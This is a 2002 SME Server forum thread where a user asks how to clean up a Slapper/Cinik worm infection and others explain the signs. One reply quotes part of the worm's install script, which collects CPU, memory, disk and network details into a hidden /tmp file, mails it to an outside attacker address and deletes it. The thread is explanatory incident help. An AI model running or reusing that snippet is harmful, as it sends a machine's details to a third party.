Koozali.org: home of the SME Server
  1. Koozali.org: home of the SME Server
  2. Legacy Forums
  3. Experienced User Forum
  4. Topic: worm
« previous next »
Pages: [1]   Go Down

worm

  • 7 Replies
  • 924 Views

gabe

worm
« on: October 01, 2002, 09:00:56 PM »
hello every body.

I'm infected by WORM.
WHat i have to do ?

1- update with 5.5 ?

2 make backup, format install 5.5 and restore ?


thanks for your ansers.

ps : sorry for my bad english, it's not my language.
Logged

eric

Re: worm
« Reply #1 on: October 03, 2002, 06:51:04 AM »
If it's the slapper worm.  Look in the /tmp directory with ls -a to view hidden files.
Logged

AlecN

Re: worm
« Reply #2 on: October 03, 2002, 01:52:04 PM »
If it's not a rude question, what should see there? I see session_mm.sem
Is that OK?
Logged

gabe

Re: worm
« Reply #3 on: October 03, 2002, 04:12:44 PM »
il have a lookk to /tmp directory, and i see some .cinick files.

if i delete those files is it enought to remove this "VIRUS" ?
Logged

Bud

Re: worm
« Reply #4 on: October 03, 2002, 08:46:59 PM »
SME doesn't have any gcc compiler tools (unless you manually added them), so the virus can't compile itself on your system.

Now I understand why you should NEVER have any compiler tools running on a production system.  It gives you another level of security.
Logged

gabe

Re: worm
« Reply #5 on: October 03, 2002, 10:58:35 PM »
The think i don't undestand is that :
i have no cc compiler on my system but the worm send email, i see taht i was infected because of undelivry message return to my admin box.
If no cc or gcc compiler is installer on my system how worm can use my mail server ?
Logged

Lightman

Re: worm
« Reply #6 on: October 04, 2002, 12:00:29 AM »
Hi gabe

The worm didn't send that mail, the script used to install the worm did that.

here is a copy of the part of the install script that do that:

The first part is to collect machine info:

echo PROC > /tmp/.cinik.status                    (get machine data)
cat /proc/cpuinfo >> /tmp/.cinik.status
echo MEM >> /tmp/.cinik.status
/usr/bin/free >> /tmp/.cinik.status
echo HDD >> /tmp/.cinik.status                   (get partitions/disks,etc)
/bin/df -h >> /tmp/.cinik.status
echo IP >> /tmp/.cinik.status                      (ifconfig, ip addresses, nets)
/sbin/ifconfig >> /tmp/.cinik.status

Then send the mail to the above address and then erases that file:
 
myip=/sbin/ifconfig eth0 | head -2 | tail -1 | cut -d: -f2 | cut -d" " -f1
mail cinik_worm@yahoo.com -s "$myip" < /tmp/.cinik.status
rm -f /tmp/.cinik.status


in my case, I though that the worm was operational but i have no gcc
so even if the script sends the email i doesn't mean that you are effectively
infected.

still I'm not sure if I'm infected with cinik or not, it seems that it's not
infected, tried to contact to the ports mentioned in the source code of
the worm but didn't work, so it's highly probable that the worm coulndn't
compile.

see you

Leo
Logged

gabe

Re: worm
« Reply #7 on: October 04, 2002, 09:06:59 PM »
thank to every body for your awnser.
Logged
Pages: [1]   Go Up
« previous next »
  1. Koozali.org: home of the SME Server
  2. Legacy Forums
  3. Experienced User Forum
  4. Topic: worm